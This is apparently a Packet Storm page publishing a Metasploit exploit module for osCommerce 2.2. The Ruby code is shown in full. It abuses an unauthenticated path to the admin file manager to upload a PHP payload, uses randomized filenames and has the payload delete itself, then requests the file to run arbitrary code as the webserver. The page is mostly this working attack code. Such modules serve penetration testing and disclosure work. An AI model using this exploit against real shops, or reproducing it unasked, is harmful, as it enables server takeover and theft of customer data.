what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

osCommerce 2.2 Arbitrary PHP Code Execution

osCommerce 2.2 Arbitrary PHP Code Execution
Posted Dec 31, 2009
Authored by egypt | Site metasploit.com

osCommerce is a popular open source E-Commerce application. The admin console contains a file management utility that allows administrators to upload, download, and edit files. This could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver.

tags | exploit, arbitrary
SHA-256 | e74aaeea615a430a6f4a22d1a117d3048d29172d6f0b6fb720906609e397a0ff

osCommerce 2.2 Arbitrary PHP Code Execution

Change Mirror Download
##
# $Id: oscommerce_filemanager.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'osCommerce 2.2 Arbitrary PHP Code Execution',
'Description' => %q{
osCommerce is a popular open source E-Commerce application.
The admin console contains a file management utility that
allows administrators to upload, download, and edit files.
This could be abused to allow unauthenticated attackers to
execute arbitrary code with the permissions of the
webserver.
},
'Author' => [ 'egypt' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7724 $',
'References' => [
[ 'OSVDB', '60018' ],
[ 'URL', 'http://www.milw0rm.com/exploits/9556' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 4000, # max url length for some old
# versions of apache according to
# http://www.boutell.com/newfaq/misc/urllength.html
'DisableNops' => true,
#'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
'Compat' =>
{
'ConnectionType' => 'find',
},
# Since our payload is uploaded as a file, it is polite to
# clean up after ourselves.
'Prepend' => "unlink(__FILE__);",
'Keys' => ['php'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))

register_options(
[
OptString.new('URI', [ true, "Base osCommerce directory path", '/catalog/']),
], self.class)

end

def exploit
# Our filename gets run through basename(), so we can have arbitrary
# junk in front of slashes and it will get stripped out. The unlink in
# Payload => Prepend above ensures that the file is deleted.
filename = rand_text_alphanumeric(rand(5)+5) + "/"
(rand(5)+5).times do
filename << rand_text_alphanumeric(rand(5)+5) + "/"
end
filename << rand_text_alphanumeric(rand(5)+5) + ".php"


p = rand_text_english(rand(100)+100) + "<?php " + payload.encoded + " ?>" + rand_text_english(rand(100)+100)
p = Rex::Text.uri_encode(p)
data = "filename=#{filename}&file_contents=#{p}"

print_status("Sending file save request")
response = send_request_raw({
'uri' => datastore['URI'] + "admin/file_manager.php/login.php?action=save",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => data.length,
}
}, 3)

# If the upload worked, the server tries to redirect us to some info
# about the file we just saved
if response and response.code != 302
print_error("Server returned non-302 status code (#{response.code})")
end

print_status("Requesting our payload")
# very short timeout because the request may never return if we're
# sending a socket payload
timeout = 0.1
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
'uri' => datastore['URI'] + File.basename(filename)
}, timeout)

handler
end
end

Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close